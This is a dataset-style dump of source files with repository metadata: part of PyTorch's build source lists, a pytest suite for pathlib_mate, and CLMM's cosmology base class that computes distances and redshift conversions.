"torch/csrc/distributed/c10d/python_comm_hook.cpp",
]
libtorch_python_distributed_sources = libtorch_python_distributed_core_sources + [
"torch/csrc/distributed/autograd/init.cpp",
"torch/csrc/distributed/rpc/init.cpp",
"torch/csrc/distributed/rpc/py_rref.cpp",
"torch/csrc/distributed/rpc/python_functions.cpp",
"torch/csrc/distributed/rpc/python_rpc_handler.cpp",
"torch/csrc/distributed/rpc/request_callback_impl.cpp",
"torch/csrc/distributed/rpc/testing/init.cpp",
"torch/csrc/distributed/rpc/unpickled_python_call.cpp",
"torch/csrc/distributed/rpc/unpickled_python_remote_call.cpp",
"torch/csrc/jit/runtime/register_distributed_ops.cpp",
]
def glob_libtorch_python_sources(gencode_pattern = ":generate-code[{}]"):
_libtorch_python_sources = [gencode_pattern.format(name) for name in [
"autograd/generated/python_functions_0.cpp",
"autograd/generated/python_functions_1.cpp",
"autograd/generated/python_functions_2.cpp",
"autograd/generated/python_functions_3.cpp",
"autograd/generated/python_functions_4.cpp",
"autograd/generated/python_nn_functions.cpp",
"autograd/generated/python_fft_functions.cpp",
"autograd/generated/python_linalg_functions.cpp",
"autograd/generated/python_special_functions.cpp",
"autograd/generated/python_torch_functions_0.cpp",
"autograd/generated/python_torch_functions_1.cpp",
"autograd/generated/python_torch_functions_2.cpp",
"autograd/generated/python_variable_methods.cpp",
]]
_libtorch_python_sources.extend(libtorch_python_core_sources)
_libtorch_python_sources.extend(libtorch_python_distributed_sources)
return _libtorch_python_sources
aten_cpu_source_non_codegen_list = [
"aten/src/ATen/AccumulateType.cpp",
"aten/src/ATen/BatchedTensorImpl.cpp",
"aten/src/ATen/CPUGeneratorImpl.cpp",
"aten/src/ATen/Context.cpp",
"aten/src/ATen/DLConvertor.cpp",
"aten/src/ATen/ExpandUtils.cpp",
"aten/src/ATen/MemoryOverlap.cpp",
"aten/src/ATen/MapAllocator.cpp",
"aten/src/ATen/NamedTensorUtils.cpp",
"aten/src/ATen/ParallelCommon.cpp",
"aten/src/ATen/ParallelNative.cpp",
"aten/src/ATen/ParallelNativeTBB.cpp",
"aten/src/ATen/ParallelOpenMP.cpp",
"aten/src/ATen/ParallelThreadPoolNative.cpp",
"aten/src/ATen/ScalarOps.cpp",
"aten/src/ATen/SequenceNumber.cpp",
"aten/src/ATen/SparseTensorImpl.cpp",
"aten/src/ATen/SparseCsrTensorImpl.cpp",
"aten/src/ATen/SparseTensorUtils.cpp",
"aten/src/ATen/TensorGeometry.cpp",
"aten/src/ATen/TensorIndexing.cpp",
"aten/src/ATen/TensorMeta.cpp",
"aten/src/ATen/TensorNames.cpp",
"aten/src/ATen/TensorUtils.cpp",
"aten/src/ATen/ThreadLocalState.cpp",
"aten/src/ATen/Utils.cpp",
"aten/src/ATen/Version.cpp",
"aten/src/ATen/VmapMode.cpp",
"aten/src/ATen/VmapTransforms.cpp",
"aten/src/ATen/core/BackendSelectFallbackKernel.cpp",
"aten/src/ATen/core/DeprecatedTypeProperties.cpp",
"aten/src/ATen/core/DeprecatedTypePropertiesRegistry.cpp",
"aten/src/ATen/core/Dict.cpp",
"aten/src/ATen/core/Dimname.cpp",
"aten/src/ATen/core/Formatting.cpp",
"aten/src/ATen/core/Generator.cpp",
"aten/src/ATen/core/List.cpp",
"aten/src/ATen/core/NamedTensor.cpp",
"aten/src/ATen/core/Tensor.cpp",
"aten/src/ATen/core/VariableFallbackKernel.cpp",
"aten/src/ATen/core/VariableHooksInterface.cpp",
"aten/src/ATen/core/Vitals.cpp",
"aten/src/ATen/core/boxing/KernelFunction.cpp",
"aten/src/ATen/core/custom_class.cpp",
"aten/src/ATen/core/dispatch/DispatchKeyExtractor.cpp",
"aten/src/ATen/core/dispatch/Dispatcher.cpp",
"aten/src/ATen/core/dispatch/ObservedOperators.cpp",
"aten/src/ATen/core/dispatch/OperatorEntry.cpp",
"aten/src/ATen/core/interned_strings.cpp",
"aten/src/ATen/core/ivalue.cpp",
"aten/src/ATen/core/library.cpp",
"aten/src/ATen/core/op_registration/infer_schema.cpp",
"aten/src/ATen/core/op_registration/op_registration.cpp",
"aten/src/ATen/core/operator_name.cpp",
"aten/src/ATen/core/PythonModeTLS.cpp",
"aten/src/ATen/core/register_symbols.cpp",
"aten/src/ATen/core/type.cpp",
"aten/src/ATen/cpu/FlushDenormal.cpp",
"aten/src/ATen/detail/CPUGuardImpl.cpp",
"aten/src/ATen/detail/CUDAHooksInterface.cpp",
"aten/src/ATen/detail/HIPHooksInterface.cpp",
"aten/src/ATen/detail/ORTHooksInterface.cpp",
"aten/src/ATen/metal/Context.cpp",
"aten/src/ATen/native/AutogradComposite.cpp",
"aten/src/ATen/native/BatchLinearAlgebraKernel.cpp",
"aten/src/ATen/native/DispatchStub.cpp",
"aten/src/ATen/native/UpSample.cpp",
"aten/src/ATen/native/mkl/LinearAlgebra.cpp",
"aten/src/ATen/native/mkl/SparseCsrLinearAlgebra.cpp",
"aten/src/ATen/native/mkl/SpectralOps.cpp",
"aten/src/ATen/native/mkldnn/BinaryOps.cpp",
"aten/src/ATen/native/mkldnn/Conv.cpp",
"aten/src/ATen/native/mkldnn/Copy.cpp",
"aten/src/ATen/native/mkldnn/Gelu.cpp",
"aten/src/ATen/native/mkldnn/IDeepRegistration.cpp",
"aten/src/ATen/native/mkldnn/Linear.cpp",
"aten/src/ATen/native/mkldnn/MKLDNNCommon.cpp",
"aten/src/ATen/native/mkldnn/MKLDNNConversions.cpp",
"aten/src/ATen/native/mkldnn/MkldnnTensorMath.cpp",
"aten/src/ATen/native/mkldnn/Normalization.cpp",
"aten/src/ATen/native/mkldnn/Pooling.cpp",
"aten/src/ATen/native/mkldnn/Relu.cpp",
"aten/src/ATen/native/mkldnn/SoftMax.cpp",
"aten/src/ATen/native/mkldnn/TensorFactories.cpp",
"aten/src/ATen/native/mkldnn/TensorShape.cpp",
"aten/src/ATen/native/mkldnn/UnaryOps.cpp",
"aten/src/ATen/native/mkldnn/Utils.cpp",
"aten/src/ATen/native/mkldnn/Matmul.cpp",
"aten/src/ATen/native/quantized/cpu/init_qnnpack.cpp",
"aten/src/ATen/record_function.cpp",
"aten/src/ATen/SavedTensorHooks.cpp",
"aten/src/ATen/vulkan/Context.cpp",
"aten/src/ATen/nnapi/nnapi_bind.cpp",
"aten/src/ATen/nnapi/nnapi_wrapper.cpp",
"aten/src/ATen/nnapi/nnapi_model_loader.cpp",
]
aten_cpu_source_codegen_list = [
"aten/src/ATen/native/cpu/AdaptiveAvgPoolKernel.cpp",
"aten/src/ATen/native/cpu/AdaptiveMaxPoolKernel.cpp",
]
# When building lite interpreter in OSS, "aten/src/ATen/native/cpu/AdaptiveAvgPoolKernel.cpp" will go through
# codegen process. The codegen version of this file, like Activation.cpp.DEFAULT.cpp, will be included
# in ${cpu_kernel_cpp} in aten/src/ATen/CMakeLists.txt. As a result, in aten/src/ATen/CMakeLists.txt,
# only aten_cpu_source_non_codegen_list need to be added to ${all_cpu_cpp}.
aten_cpu_source_list = sorted(aten_cpu_source_non_codegen_list + aten_cpu_source_codegen_list)
# Same as ${aten_cpu_source_codegen_list}, this list will go through aten codegen, and be included in
# ${cpu_kernel_cpp} in aten/src/ATen/CMakeLists.txt.
aten_native_source_codegen_list = [
"aten/src/ATen/native/cpu/Activation.cpp",
"aten/src/ATen/native/cpu/AvgPoolKernel.cpp",
"aten/src/ATen/native/cpu/BinaryOpsKernel.cpp",
"aten/src/ATen/native/cpu/BlasKernel.cpp",
"aten/src/ATen/native/cpu/CatKernel.cpp",
"aten/src/ATen/native/cpu/ComplexKernel.cpp",
"aten/src/ATen/native/cpu/CopyKernel.cpp",
"aten/src/ATen/native/cpu/CrossKernel.cpp",
"aten/src/ATen/native/cpu/DepthwiseConvKernel.cpp",
"aten/src/ATen/native/cpu/DistanceOpsKernel.cpp",
"aten/src/ATen/native/cpu/FillKernel.cpp",
"aten/src/ATen/native/cpu/FunctionOfAMatrixUtilsKernel.cpp",
"aten/src/ATen/native/cpu/GridSamplerKernel.cpp",
"aten/src/ATen/native/cpu/HistogramKernel.cpp",
"aten/src/ATen/native/cpu/IndexKernel.cpp",
"aten/src/ATen/native/cpu/LerpKernel.cpp",
"aten/src/ATen/native/cpu/LinearAlgebraKernel.cpp",
"aten/src/ATen/native/cpu/MaxPooling.cpp",
"aten/src/ATen/native/cpu/MaxPoolKernel.cpp",
"aten/src/ATen/native/cpu/MaxUnpoolKernel.cpp",
"aten/src/ATen/native/cpu/MultinomialKernel.cpp",
"aten/src/ATen/native/cpu/PointwiseOpsKernel.cpp",
"aten/src/ATen/native/cpu/PowKernel.cpp",
"aten/src/ATen/native/cpu/RangeFactoriesKernel.cpp",
"aten/src/ATen/native/cpu/ReduceAllOpsKernel.cpp",
"aten/src/ATen/native/cpu/ReduceOpsKernel.cpp",
"aten/src/ATen/native/cpu/RenormKernel.cpp",
"aten/src/ATen/native/cpu/ScatterGatherKernel.cpp",
"aten/src/ATen/native/cpu/SoftMaxKernel.cpp",
"aten/src/ATen/native/cpu/SortingKernel.cpp",
"aten/src/ATen/native/cpu/StackKernel.cpp",
"aten/src/ATen/native/cpu/SumKernel.cpp",
"aten/src/ATen/native/cpu/TensorCompareKernel.cpp",
"aten/src/ATen/native/cpu/UnaryOpsKernel.cpp",
"aten/src/ATen/native/cpu/Unfold2d.cpp",
"aten/src/ATen/native/cpu/UnfoldBackwardKernel.cpp",
"aten/src/ATen/native/cpu/UpSampleKernel.cpp",
"aten/src/ATen/native/cpu/UpSampleMoreKernel.cpp",
"aten/src/ATen/native/cpu/batch_norm_kernel.cpp",
"aten/src/ATen/native/cpu/group_norm_kernel.cpp",
"aten/src/ATen/native/cpu/layer_norm_kernel.cpp",
"aten/src/ATen/native/quantized/cpu/kernels/QuantizedOpKernels.cpp",
]
# This aten native source file list will not go through aten codegen process
aten_native_source_non_codegen_list = [
"aten/src/ATen/native/ao_sparse/library.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/fbgemm_utils.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/qlinear.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/qlinear_dynamic.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/qlinear_prepack.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/qlinear_unpack.cpp",
"aten/src/ATen/native/quantized/cpu/fbgemm_utils.cpp",
"aten/src/ATen/native/quantized/cpu/fused_obs_fake_quant.cpp",
"aten/src/ATen/native/quantized/cpu/int_repr_quant.cpp",
"aten/src/ATen/native/quantized/cpu/make_per_tensor_quantized_tensor.cpp",
"aten/src/ATen/native/quantized/cpu/q_adaavgpool.cpp",
"aten/src/ATen/native/quantized/cpu/q_avgpool.cpp",
"aten/src/ATen/native/quantized/cpu/q_avgpool3d.cpp",
"aten/src/ATen/native/quantized/cpu/qadd.cpp",
"aten/src/ATen/native/quantized/cpu/qbatch_norm.cpp",
"aten/src/ATen/native/quantized/cpu/qchannel_shuffle.cpp",
"aten/src/ATen/native/quantized/cpu/qclamp.cpp",
"aten/src/ATen/native/quantized/cpu/qconcat.cpp",
"aten/src/ATen/native/quantized/cpu/qconv.cpp",
"aten/src/ATen/native/quantized/cpu/qconv_prepack.cpp",
"aten/src/ATen/native/quantized/cpu/qconv_unpack.cpp",
"aten/src/ATen/native/quantized/cpu/qelu.cpp",
"aten/src/ATen/native/quantized/cpu/qembeddingbag.cpp",
"aten/src/ATen/native/quantized/cpu/qembeddingbag_prepack.cpp",
"aten/src/ATen/native/quantized/cpu/qembeddingbag_unpack.cpp",
"aten/src/ATen/native/quantized/cpu/qhardsigmoid.cpp",
"aten/src/ATen/native/quantized/cpu/qhardswish.cpp",
"aten/src/ATen/native/quantized/cpu/qlinear.cpp",
"aten/src/ATen/native/quantized/cpu/qlinear_dynamic.cpp",
"aten/src/ATen/native/quantized/cpu/qlinear_prepack.cpp",
"aten/src/ATen/native/quantized/cpu/qlinear_unpack.cpp",
"aten/src/ATen/native/quantized/cpu/qmul.cpp",
"aten/src/ATen/native/quantized/cpu/qnormalization.cpp",
"aten/src/ATen/native/quantized/cpu/qpool.cpp",
"aten/src/ATen/native/quantized/cpu/qreduction.cpp",
"aten/src/ATen/native/quantized/cpu/qrelu.cpp",
"aten/src/ATen/native/quantized/cpu/qsigmoid.cpp",
"aten/src/ATen/native/quantized/cpu/qsort.cpp",
"aten/src/ATen/native/quantized/cpu/qtanh.cpp",
"aten/src/ATen/native/quantized/cpu/qthreshold.cpp",
"aten/src/ATen/native/quantized/cpu/qupsample_bilinear2d.cpp",
"aten/src/ATen/native/quantized/cpu/qupsample_nearest2d.cpp",
"aten/src/ATen/native/quantized/cpu/qupsample_nearest3d.cpp",
"aten/src/ATen/native/quantized/cpu/tensor_operators.cpp",
"aten/src/ATen/native/quantized/Copy.cpp",
"aten/src/ATen/native/quantized/QTensor.cpp",
"aten/src/ATen/native/quantized/TensorCompare.cpp",
"aten/src/ATen/native/quantized/TensorFactories.cpp",
"aten/src/ATen/native/quantized/affine_quantizer.cpp",
"aten/src/ATen/native/quantized/affine_quantizer_base.cpp",
"aten/src/ATen/native/quantized/fake_quant_per_channel_affine.cpp",
"aten/src/ATen/native/quantized/fake_quant_per_tensor_affine.cpp",
"aten/src/ATen/native/quantized/library.cpp",
"aten/src/ATen/quantized/QTensorImpl.cpp",
"aten/src/ATen/quantized/Quantizer.cpp",
"aten/src/ATen/native/Activation.cpp",
"aten/src/ATen/native/AdaptiveAveragePooling.cpp",
"aten/src/ATen/native/AdaptiveAveragePooling3d.cpp",
"aten/src/ATen/native/AdaptiveMaxPooling2d.cpp",
"aten/src/ATen/native/AdaptiveMaxPooling3d.cpp",
"aten/src/ATen/native/AffineGridGenerator.cpp",
"aten/src/ATen/native/AveragePool2d.cpp",
"aten/src/ATen/native/AveragePool3d.cpp",
"aten/src/ATen/native/BatchLinearAlgebra.cpp",
"aten/src/ATen/native/Batching.cpp",
"aten/src/ATen/native/BinaryOps.cpp",
"aten/src/ATen/native/Blas.cpp",
"aten/src/ATen/native/BlasKernel.cpp",
"aten/src/ATen/native/Bucketization.cpp",
"aten/src/ATen/native/CPUBlas.cpp",
"aten/src/ATen/native/ChanelShuffle.cpp",
"aten/src/ATen/native/Col2Im.cpp",
"aten/src/ATen/native/ConstantPadNd.cpp",
"aten/src/ATen/native/Convolution.cpp",
"aten/src/ATen/native/ConvolutionMM2d.cpp",
"aten/src/ATen/native/ConvolutionMM3d.cpp",
"aten/src/ATen/native/ConvolutionTBC.cpp",
"aten/src/ATen/native/Copy.cpp",
"aten/src/ATen/native/Correlation.cpp",
"aten/src/ATen/native/CPUFallback.cpp",
"aten/src/ATen/native/Cross.cpp",
"aten/src/ATen/native/DilatedMaxPool2d.cpp",
"aten/src/ATen/native/DilatedMaxPool3d.cpp",
# Referenced by both native and ATen/Version.cpp. Does not reference to other native symbols
# "aten/src/ATen/native/DispatchStub.cpp",
# "aten/src/ATen/native/quantized/cpu/init_qnnpack.cpp",
"aten/src/ATen/native/Distance.cpp",
"aten/src/ATen/native/Distributions.cpp",
"aten/src/ATen/native/Dropout.cpp",
"aten/src/ATen/native/Embedding.cpp",
"aten/src/ATen/native/EmbeddingBag.cpp",
"aten/src/ATen/native/Fill.cpp",
"aten/src/ATen/native/ForeachOpsKernels.cpp",
"aten/src/ATen/native/FractionalMaxPool2d.cpp",
"aten/src/ATen/native/FractionalMaxPool3d.cpp",
"aten/src/ATen/native/FunctionOfAMatrixUtils.cpp",
"aten/src/ATen/native/GatedLinearUnit.cpp",
"aten/src/ATen/native/GridSampler.cpp",
"aten/src/ATen/native/Histogram.cpp",
"aten/src/ATen/native/Im2Col.cpp",
"aten/src/ATen/native/IndexingUtils.cpp",
"aten/src/ATen/native/Integration.cpp",
"aten/src/ATen/native/Itertools.cpp",
"aten/src/ATen/native/LegacyBridge.cpp",
"aten/src/ATen/native/Lerp.cpp",
"aten/src/ATen/native/Linear.cpp",
"aten/src/ATen/native/LinearAlgebra.cpp",
"aten/src/ATen/native/Loss.cpp",
"aten/src/ATen/native/LossCTC.cpp",
"aten/src/ATen/native/LossMultiLabelMargin.cpp",
"aten/src/ATen/native/LossMultiMargin.cpp",
"aten/src/ATen/native/LossNLL.cpp",
"aten/src/ATen/native/LossNLL2d.cpp",
"aten/src/ATen/native/MaxPooling.cpp",
"aten/src/ATen/native/MaxUnpooling.cpp",
"aten/src/ATen/native/Memory.cpp",
"aten/src/ATen/native/MetaTensor.cpp",
"aten/src/ATen/native/NNPACK.cpp",
"aten/src/ATen/native/NaiveConvolutionTranspose2d.cpp",
"aten/src/ATen/native/NaiveConvolutionTranspose3d.cpp",
"aten/src/ATen/native/NaiveDilatedConvolution.cpp",
"aten/src/ATen/native/NamedTensor.cpp",
"aten/src/ATen/native/Normalization.cpp",
"aten/src/ATen/native/Onehot.cpp",
"aten/src/ATen/native/PackedSequence.cpp",
"aten/src/ATen/native/PixelShuffle.cpp",
"aten/src/ATen/native/PointwiseOps.cpp",
"aten/src/ATen/native/Pooling.cpp",
"aten/src/ATen/native/Pow.cpp",
"aten/src/ATen/native/QuantizedLinear.cpp",
"aten/src/ATen/native/RNN.cpp",
"aten/src/ATen/native/RangeFactories.cpp",
"aten/src/ATen/native/ReduceAllOps.cpp",
"aten/src/ATen/native/ReduceOps.cpp",
"aten/src/ATen/native/ReflectionPad.cpp",
"aten/src/ATen/native/Repeat.cpp",
"aten/src/ATen/native/ReplicationPadding.cpp",
"aten/src/ATen/native/Resize.cpp",
"aten/src/ATen/native/RowwisePrune.cpp",
"aten/src/ATen/native/SegmentReduce.cpp",
"aten/src/ATen/native/Scalar.cpp",
"aten/src/ATen/native/SobolEngineOps.cpp",
"aten/src/ATen/native/SobolEngineOpsUtils.cpp",
"aten/src/ATen/native/SoftMax.cpp",
"aten/src/ATen/native/Sorting.cpp",
"aten/src/ATen/native/SpectralOps.cpp",
"aten/src/ATen/native/SummaryOps.cpp",
"aten/src/ATen/native/TensorAdvancedIndexing.cpp",
"aten/src/ATen/native/TensorCompare.cpp",
"aten/src/ATen/native/TensorConversions.cpp",
"aten/src/ATen/native/TensorFactories.cpp",
"aten/src/ATen/native/TensorIteratorReduce.cpp",
"aten/src/ATen/native/TensorProperties.cpp",
"aten/src/ATen/native/TensorShape.cpp",
"aten/src/ATen/native/TensorTransformations.cpp",
"aten/src/ATen/native/TestOps.cpp",
"aten/src/ATen/native/TriangularOps.cpp",
"aten/src/ATen/native/TypeProperties.cpp",
"aten/src/ATen/native/UnaryOps.cpp",
"aten/src/ATen/native/Unfold2d.cpp",
"aten/src/ATen/native/Unfold3d.cpp",
"aten/src/ATen/native/UnfoldBackward.cpp",
"aten/src/ATen/native/Unique.cpp",
# Low-level functions that can be directly referenced
# "aten/src/ATen/native/UpSample.cpp",
"aten/src/ATen/native/UpSampleBicubic2d.cpp",
"aten/src/ATen/native/UpSampleBilinear2d.cpp",
"aten/src/ATen/native/UpSampleLinear1d.cpp",
"aten/src/ATen/native/UpSampleNearest1d.cpp",
"aten/src/ATen/native/UpSampleNearest2d.cpp",
"aten/src/ATen/native/UpSampleNearest3d.cpp",
"aten/src/ATen/native/UpSampleTrilinear3d.cpp",
"aten/src/ATen/native/VariableMethodStubs.cpp",
"aten/src/ATen/native/WeightNorm.cpp",
"aten/src/ATen/native/group_norm.cpp",
"aten/src/ATen/native/layer_norm.cpp",
"aten/src/ATen/native/sparse/ParamUtils.cpp",
"aten/src/ATen/native/sparse/SoftMax.cpp",
"aten/src/ATen/native/sparse/SparseMatMul.cpp",
"aten/src/ATen/native/sparse/SparseTensor.cpp",
"aten/src/ATen/native/sparse/SparseCsrTensor.cpp",
"aten/src/ATen/native/sparse/SparseTensorMath.cpp",
"aten/src/ATen/native/sparse/SparseCsrTensorMath.cpp",
"aten/src/TH/THGeneral.cpp",
"aten/src/TH/THStorageFunctions.cpp",
"aten/src/TH/THTensor.cpp",
"aten/src/ATen/native/utils/Factory.cpp",
"aten/src/ATen/native/xnnpack/Activation.cpp",
"aten/src/ATen/native/xnnpack/ChannelShuffle.cpp",
"aten/src/ATen/native/xnnpack/Convolution.cpp",
"aten/src/ATen/native/xnnpack/AveragePooling.cpp",
"aten/src/ATen/native/xnnpack/Init.cpp",
"aten/src/ATen/native/xnnpack/Linear.cpp",
"aten/src/ATen/native/xnnpack/MaxPooling.cpp",
"aten/src/ATen/native/xnnpack/OpContext.cpp",
"aten/src/ATen/native/xnnpack/RegisterOpContextClass.cpp",
"aten/src/ATen/native/xnnpack/Shim.cpp",
# Files not in native, but depends on native symbols
# "aten/src/ATen/TensorIndexing.cpp",
"aten/src/ATen/TensorIterator.cpp",
"aten/src/ATen/nnapi/nnapi_register.cpp",
]
# 1. Files in ATen/native with a few exceptions
# TODO: move the exceptions to proper locations
# 2. The whole aten native source list includes the list with and without aten codegen process.
aten_native_source_list = sorted(aten_native_source_non_codegen_list + aten_native_source_codegen_list)
| 47.099481
| 134
| 0.738608
|
4a1904463fbf8aed011d6c5d888f477e501d06b0
| 2,011
|
py
|
Python
|
tests/test_mate_tool_box_stateless.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 9
|
2017-09-07T21:21:43.000Z
|
2020-10-11T09:47:24.000Z
|
tests/test_mate_tool_box_stateless.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 2
|
2018-10-16T14:30:26.000Z
|
2020-12-05T02:40:46.000Z
|
tests/test_mate_tool_box_stateless.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 2
|
2017-09-05T14:06:01.000Z
|
2021-06-29T15:31:13.000Z
|
# -*- coding: utf-8 -*-
import pytest
from pytest import raises
from pathlib_mate.pathlib2 import Path
class TestToolBoxStateless(object):
def test_dir_fingerprint(self):
p = Path(Path(__file__).dirpath)
assert p.dir_md5 == p.dir_md5
assert p.dir_sha256 == p.dir_sha256
assert p.dir_sha512 == p.dir_sha512
def test_is_empty(self):
assert Path(__file__).is_empty() is False
assert Path(__file__).parent.is_empty() is False
with raises(Exception):
assert Path("THIS-FILE-NOT-EXISTS.txt").is_empty()
def test_auto_complete_choices(self):
p = Path(__file__).change(new_basename="te")
for p in p.auto_complete_choices():
assert p.basename.lower().startswith("te")
p = Path(__file__).parent
for p1 in p.auto_complete_choices():
assert p1 in p
def test_print_big_file(self):
"""
Not need in travis.
"""
path = Path(__file__).absolute().parent.parent # pathlibm_mate-project
path.print_big_file()
path.print_big_dir()
def test_print_big_dir_and_big_file(self):
"""
Not need in travis.
"""
path = Path(__file__).absolute().parent.parent # pathlibm_mate-project
path.print_big_dir_and_big_file()
def test_dir_stat_attribute(self):
p = Path(__file__).change(new_basename="app")
assert p.n_file >= 4
assert p.n_subfile >= 3
assert p.n_dir == 1
assert p.n_subdir == 1
def test_file_stat(self):
"""
Not need in travis.
"""
p = Path(__file__).parent
stat = p.file_stat()
assert stat["file"] >= 14
assert stat["dir"] >= 2
assert stat["size"] >= 32000
all_stat = p.file_stat_for_all()
assert all_stat[p.abspath] == stat
if __name__ == "__main__":
import os
basename = os.path.basename(__file__)
pytest.main([basename, "-s", "--tb=native"])
| 28.323944
| 79
| 0.606663
|
4a19046c82885ac3bedad4c34dc99c2befbadb4b
| 8,128
|
py
|
Python
|
clmm/cosmology/parent_class.py
|
LSSTDESC/CLMM
|
7922ad984a297393d57b3f89ed708fec18e04e3a
|
[
"BSD-3-Clause"
] | 20
|
2018-02-23T22:28:39.000Z
|
2022-03-24T07:03:47.000Z
|
clmm/cosmology/parent_class.py
|
LSSTDESC/CLMM
|
7922ad984a297393d57b3f89ed708fec18e04e3a
|
[
"BSD-3-Clause"
] | 446
|
2018-06-01T17:43:41.000Z
|
2022-03-31T13:29:23.000Z
|
clmm/cosmology/parent_class.py
|
LSSTDESC/CLMM
|
7922ad984a297393d57b3f89ed708fec18e04e3a
|
[
"BSD-3-Clause"
] | 20
|
2019-01-18T08:16:11.000Z
|
2022-03-29T05:27:00.000Z
|
"""@file parent_class.py
"""
# CLMM Cosmology object abstract superclass
import numpy as np
class CLMMCosmology:
"""
Cosmology object superclass for supporting multiple back-end cosmology objects
Attributes
----------
backend: str
Name of back-end used
be_cosmo: cosmology library
Cosmology library used in the back-end
"""
def __init__(self, **kwargs):
self.backend = None
self.be_cosmo = None
self.set_be_cosmo(**kwargs)
def __getitem__(self, key):
if isinstance(key, str):
return self._get_param(key)
raise TypeError(f'input must be str, not {type(key)}')
def __setitem__(self, key, val):
if isinstance(key, str):
self._set_param(key, val)
else:
raise TypeError(f'key input must be str, not {type(key)}')
def _init_from_cosmo(self, be_cosmo):
"""
To be filled in child classes
"""
raise NotImplementedError
def _init_from_params(self, **kwargs):
"""
To be filled in child classes
"""
raise NotImplementedError
def _set_param(self, key, value):
"""
To be filled in child classes
"""
raise NotImplementedError
def _get_param(self, key):
"""
To be filled in child classes
"""
raise NotImplementedError
def get_desc(self):
"""
Returns the Cosmology description.
"""
return (f"{type(self).__name__}(H0={self['H0']}, Omega_dm0={self['Omega_dm0']}, "
f"Omega_b0={self['Omega_b0']}, Omega_k0={self['Omega_k0']})")
def set_be_cosmo(self, be_cosmo=None, H0=67.66, Omega_b0=0.049, Omega_dm0=0.262, Omega_k0=0.0):
"""Set the cosmology
Parameters
----------
be_cosmo: clmm.cosmology.Cosmology object, None
Input cosmology, used if not None
**kwargs
Individual cosmological parameters
"""
if be_cosmo:
self._init_from_cosmo(be_cosmo)
else:
self._init_from_params(
H0=H0, Omega_b0=Omega_b0, Omega_dm0=Omega_dm0, Omega_k0=Omega_k0)
def get_Omega_m(self, z):
r"""Gets the value of the dimensionless matter density
.. math::
\Omega_m(z) = \frac{\rho_m(z)}{\rho_\mathrm{crit}(z)}.
Parameters
----------
z : float
Redshift.
Returns
-------
Omega_m : float
dimensionless matter density, :math:`\Omega_m(z)`.
Notes
-----
Need to decide if non-relativist neutrinos will contribute here.
"""
raise NotImplementedError
def get_E2Omega_m(self, z):
r"""Gets the value of the dimensionless matter density times hubble parameter
(normalized at 0)
.. math::
\Omega_m(z) = \frac{\rho_m(z)}{\rho_\mathrm{crit}(z)}\frac{H(z)^{2}}{H_{0}^{2}}.
Parameters
----------
z : float
Redshift.
Returns
-------
Omega_m : float
dimensionless matter density, :math:`\Omega_m(z)\;H(z)^{2}/H_{0}^{2}`.
Notes
-----
Need to decide if non-relativist neutrinos will contribute here.
"""
raise NotImplementedError
def eval_da_z1z2(self, z1, z2):
r"""Computes the angular diameter distance between z1 and z2.
.. math::
d_a(z1, z2) = \frac{c}{H_0}\frac{1}{1+z2}\int_{z1}^{z2}\frac{dz'}{E(z')}
Parameters
----------
z1 : float
Redshift.
z2 : float
Redshift.
Returns
-------
float
Angular diameter distance in units :math:`M\!pc`
Notes
-----
Describe the vectorization.
"""
raise NotImplementedError
def eval_da(self, z):
r"""Computes the angular diameter distance between 0.0 and z.
.. math::
d_a(z) = \frac{c}{H_0}\frac{1}{1+z}\int_{0}^{z}\frac{dz'}{E(z')}
Parameters
----------
z : float
Redshift.
Returns
-------
float
Angular diameter distance in units :math:`M\!pc`
Notes
-----
Describe the vectorization.
"""
return self.eval_da_z1z2(0.0, z)
def eval_da_a1a2(self, a1, a2=1.):
r"""This is a function to calculate the angular diameter distance
between two scale factors.
.. math::
d_a(a1, a2) = \frac{c}{H_0}a2\int_{a2}^{a1}\frac{da'}{a'^2E(a')}
If only a1 is specified, this function returns the angular diameter
distance from a=1 to a1. If both a1 and a2 are specified, this function
returns the angular diameter distance between a1 and a2.
.. math::
d_a(a) = \frac{c}{H_0}a\int_{a}^{1}\frac{da'}{a'^2E(a')}
Parameters
----------
a1 : float
Scale factor.
a2 : float, optional
Scale factor.
Returns
-------
float
Angular diameter distance in units :math:`M\!pc`
"""
z1 = self.get_z_from_a(a2)
z2 = self.get_z_from_a(a1)
return self.eval_da_z1z2(z1, z2)
def get_a_from_z(self, z):
""" Convert redshift to scale factor
Parameters
----------
z : array_like
Redshift
Returns
-------
scale_factor : array_like
Scale factor
"""
z = np.array(z)
if np.any(z < 0.0):
raise ValueError(
"Cannot convert negative redshift to scale factor")
return 1.0/(1.0+z)
def get_z_from_a(self, a):
""" Convert scale factor to redshift
Parameters
----------
a : array_like
Scale factor
Returns
-------
z : array_like
Redshift
"""
a = np.array(a)
if np.any(a > 1.0):
raise ValueError(
"Cannot convert invalid scale factor a > 1 to redshift")
return (1.0/a)-1.0
def rad2mpc(self, dist1, redshift):
r""" Convert between radians and Mpc using the small angle approximation
and :math:`d = D_A \theta`.
Parameters
----------
dist1 : array_like
Input distances in radians
redshift : float
Redshift used to convert between angular and physical units
cosmo : astropy.cosmology
Astropy cosmology object to compute angular diameter distance to
convert between physical and angular units
do_inverse : bool
If true, converts Mpc to radians
Returns
-------
dist2 : array_like
Distances in Mpc
"""
return dist1*self.eval_da(redshift)
def mpc2rad(self, dist1, redshift):
r""" Convert between radians and Mpc using the small angle approximation
and :math:`d = D_A \theta`.
Parameters
----------
dist1 : array_like
Input distances in Mpc
redshift : float
Redshift used to convert between angular and physical units
cosmo : astropy.cosmology
Astropy cosmology object to compute angular diameter distance to
convert between physical and angular units
do_inverse : bool
If true, converts Mpc to radians
Returns
-------
dist2 : array_like
Distances in radians
"""
return dist1/self.eval_da(redshift)
def eval_sigma_crit(self, z_len, z_src):
r"""Computes the critical surface density
Parameters
----------
z_len : float
Lens redshift
z_src : array_like, float
Background source galaxy redshift(s)
Returns
-------
float
Cosmology-dependent critical surface density in units of :math:`M_\odot\ Mpc^{-2}`
"""
raise NotImplementedError
| 28.222222
| 99
| 0.537156
|
